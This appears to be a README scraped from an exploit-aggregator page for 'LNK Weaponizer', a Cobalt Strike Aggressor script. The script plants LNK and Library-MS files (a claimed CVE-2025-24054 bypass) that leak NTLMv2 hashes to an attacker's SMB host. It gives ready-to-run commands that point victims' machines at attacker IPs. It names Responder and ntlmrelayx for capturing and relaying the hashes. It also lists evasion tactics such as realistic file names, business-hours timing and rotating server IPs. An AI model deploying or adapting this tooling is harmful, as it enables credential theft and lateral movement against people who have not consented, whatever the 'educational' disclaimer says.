来源

关联漏洞

介绍

# LNK Weaponizer v2.0 - Cobalt Strike Aggressor Script

A comprehensive Cobalt Strike Aggressor script that weaponizes and executes malicious LNK files and Library-MS files for SMB NTLMv2-SSP hash disclosure. Includes CVE-2025-24054 bypass techniques.

## ⚠️ DISCLAIMER

**This tool is for educational and research purposes only. The author takes no responsibility for any misuse of this code. Use only on systems you own or have explicit permission to test.**

### Capturing NTLM Hashes
This script generates weaponized `.lnk` and `.library-ms` files that trigger SMB authentication to the operator’s host when opened.  
The leaked NTLMv2 hashes are **not shown in Cobalt Strike**, but must be captured with external tools such as **Responder**, **Impacket’s ntlmrelayx.py**, or **Inveigh** running on the attacker system.  
Once collected, the hashes can be cracked with **Hashcat** or relayed for further lateral movement.  

## 🎯 Features

- **LNK File Weaponization**: Creates malicious shortcut files for NTLM hash capture
- **Library-MS File Creation**: Implements CVE-2025-24054 bypass technique
- **Right-Click Menu Integration**: Easy access through Cobalt Strike's beacon context menu
- **Command-Line Interface**: Direct commands for automation and scripting
- **Interactive Dialogs**: User-friendly parameter input
- **Quick Deployment**: Pre-configured settings for rapid deployment
- **Global Configuration**: Easy customization of default settings

## 📁 Project Structure

```
cobalt-strike-aggressor/
├── lnk_weaponizer.cna           # Main Aggressor script (v2.0)
├── standalone_lnk_weaponizer.ps1 # Standalone PowerShell version
├── README.md                    # This documentation
├── INSTALL.md                   # Installation and setup guide
└── examples/
    ├── usage_scenarios.md       # Practical usage examples
    └── sample_targets.csv       # Sample batch operation file
```

## 🚀 Installation

1. Copy `lnk_weaponizer.cna` to your Cobalt Strike Aggressor scripts directory
2. Load the script in Cobalt Strike:
   - Go to `Cobalt Strike` → `Script Manager`
   - Click `Load` and select `lnk_weaponizer.cna`
3. The script will automatically initialize and show available commands

## 📖 Usage

### Right-Click Menu Options

Right-click on any beacon in Cobalt Strike to access:

1. **Create LNK File**: Interactive dialog for custom LNK creation
2. **Create Library-MS File**: Interactive dialog for Library-MS creation (CVE-2025-24054 bypass)
3. **Quick LNK (Default Settings)**: Fast LNK deployment with preset values
4. **Quick Library-MS (Default Settings)**: Fast Library-MS deployment with preset values

### Command-Line Commands

#### LNK File Commands
```bash
# Create LNK file with custom parameters
lnk_create <path> <ip> <share> <file>

# Example
lnk_create C:\Temp 192.168.1.10 share payload.exe
```

#### Library-MS File Commands
```bash
# Create Library-MS file with custom parameters
library_create <path> <ip> <share>

# Example
library_create C:\Temp 10.10.14.22 share
```

#### Quick Commands
```bash
# Use default settings
lnk_quick
library_quick

# Show help
lnk_help
```

## 🔧 Configuration

### Default Settings

The script uses these configurable default values:
- **IP**: `192.168.1.10`
- **Share**: `share`
- **Path**: `C:\Temp`

### Customizing Defaults

Edit the global variables in `lnk_weaponizer.cna`:

```cna
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";
```

## 🎯 How It Works

### LNK File Technique
1. **PowerShell Script Generation**: Creates a PowerShell script that generates the malicious LNK file
2. **LNK File Creation**: Uses Windows Shell COM object to create shortcut pointing to remote SMB location
3. **Icon Triggering**: Forces Explorer to fetch PE icon from remote binary, triggering NTLM authentication
4. **Hash Capture**: NTLMv2-SSP hash is captured when user interacts with the file

### Library-MS Technique (CVE-2025-24054 Bypass)
1. **XML Generation**: Creates Library-MS XML file with UNC path reference
2. **File Creation**: Generates `.library-ms` file in target directory
3. **User Interaction**: When user double-clicks the Library-MS file, Windows attempts to access the UNC path
4. **Authentication Trigger**: SMB authentication is triggered, capturing NTLM hash

### Technical Details

Both techniques create files that:
- Point to remote SMB locations
- Trigger authentication when accessed
- Bypass common security controls
- Provide reliable hash capture

## 📊 Output Format

The script provides detailed logging:

```
[+] Creating LNK file on TARGET-COMPUTER
[+] Target UNC: \\192.168.1.10\share\payload.exe
[+] Local Path: C:\Temp
[+] LNK weaponization completed
[!] Wait for user to click the LNK file to capture NTLM hash
```

## 🛡️ Security Considerations

### Detection Avoidance
- Use legitimate-looking share names and paths
- Consider timing of deployment to avoid detection
- Monitor for security tool alerts
- Library-MS technique provides additional evasion

### Operational Security
- Use dedicated SMB servers for hash collection
- Implement proper logging and monitoring
- Follow your organization's red team procedures
- Document all testing activities

### Legal Compliance
- Ensure proper authorization before testing
- Document all testing activities
- Respect scope and boundaries

## 🔍 Troubleshooting

### Common Issues

1. **Beacon Not Found**
   - Ensure target computer has an active beacon
   - Check computer name spelling in batch operations

2. **Permission Denied**
   - Verify write permissions on target path
   - Check UAC settings on target system

3. **PowerShell Execution Policy**
   - Script uses `bpowershell()` to handle restrictions
   - Ensure PowerShell is available on target

### Debug Mode

Enable verbose output by modifying the script:
```cna
# Add debug logging
blog($bid, "[DEBUG] Executing command: " . $command);
```

## 📝 Examples

### Scenario 1: LNK File Deployment
```bash
# Create LNK file on specific target
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe
```

### Scenario 2: Library-MS Bypass
```bash
# Create Library-MS file for CVE-2025-24054 bypass
library_create C:\Users\Public\Desktop 192.168.1.100 share
```

### Scenario 3: Quick Attack
```bash
# Use default settings for rapid deployment
lnk_quick
library_quick
```

## 🔬 Advanced Techniques

### CVE-2025-24054 Bypass
The Library-MS technique implements a bypass for CVE-2025-24054 by:
- Using Library-MS file format instead of traditional LNK files
- Leveraging Windows Library system for authentication triggers
- Providing additional evasion capabilities

### Evasion Strategies
- **File Naming**: Use realistic names and extensions
- **Path Selection**: Deploy in common user directories
- **Timing**: Execute during normal business hours
- **Rotation**: Vary SMB server IPs and share names

## 🤝 Contributing

1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Test thoroughly
5. Submit a pull request

## 📄 License

This project is provided as-is for educational purposes. Use responsibly and in accordance with applicable laws and regulations.

## 🙏 Acknowledgments

- Cobalt Strike team for the Aggressor framework
- Red team community for testing and feedback
- Security researchers who pioneered LNK-based attacks
- Contributors to CVE-2025-24054 research

---

**Remember: Always obtain proper authorization before testing on any system.**

文件快照

 [4.0K]  /data/pocs/5829dae36abe3debe2051daa81cf44f885902b54
├── [4.0K]  examples
│   ├── [ 985]  sample_targets.csv
│   └── [8.7K]  usage_scenarios.md
├── [6.1K]  INSTALL.md
├── [9.9K]  lnk_weaponizer.cna
├── [7.4K]  README.md
└── [8.8K]  standalone_lnk_weaponizer.ps1

1 directory, 6 files

备注